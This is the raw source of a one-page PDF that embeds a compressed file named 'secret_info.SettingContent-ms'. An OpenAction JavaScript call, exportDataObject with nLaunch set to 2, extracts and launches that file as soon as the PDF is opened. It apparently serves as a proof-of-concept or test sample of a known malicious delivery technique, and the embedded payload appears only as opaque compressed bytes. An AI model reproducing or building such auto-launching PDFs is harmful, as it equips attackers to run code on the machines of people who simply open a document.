%PDF-1.1
1 0 obj
 /Type /Catalog
 /Outlines 2 0 R
 /Pages 3 0 R
 /Names << /EmbeddedFiles << /Names [(secret_info.SettingContent-ms) 7 0 R] >> >>
 /OpenAction 9 0 R
endobj
2 0 obj
 /Type /Outlines
 /Count 0
endobj
3 0 obj
 /Type /Pages
 /Kids [4 0 R]
 /Count 1
endobj
4 0 obj
 /Type /Page
 /Parent 3 0 R
 /MediaBox [0 0 612 792]
 /Contents 5 0 R
 /Resources <<
             /ProcSet [/PDF /Text]
             /Font << /F1 6 0 R >>
            >>
endobj
5 0 obj
<< /Length 96 >>
stream
BT /F1 12 Tf 70 700 Td 15 TL (This PDF document embeds file secret_info.SettingContent-ms) Tj ET
endstream
endobj
6 0 obj
 /Type /Font
 /Subtype /Type1
 /Name /F1
 /BaseFont /Helvetica
 /Encoding /MacRomanEncoding
endobj
7 0 obj
 /Type /Filespec
 /F (secret_info.SettingContent-ms)
 /EF << /F 8 0 R >>
endobj
8 0 obj
 /Length 537
 /Filter /FlateDecode
 /Type /EmbeddedFile
stream
}Sao
9%8V
Kx!m
<TSo
6r^L5
T6fz
Ma%[
{uju
endstream
endobj
9 0 obj
 /Type /Action
 /S /JavaScript
 /JS (this.exportDataObject({ cName: "secret_info.SettingContent-ms", nLaunch: 2 });)
endobj
xref
0 10
0000000000 65535 f 
0000000016 00000 n 
0000000186 00000 n 
0000000235 00000 n 
0000000296 00000 n 
0000000488 00000 n 
0000000635 00000 n 
0000000749 00000 n 
0000000844 00000 n 
0000001477 00000 n 
trailer
 /Size 10
 /Root 1 0 R
startxref
1616
%%EOF
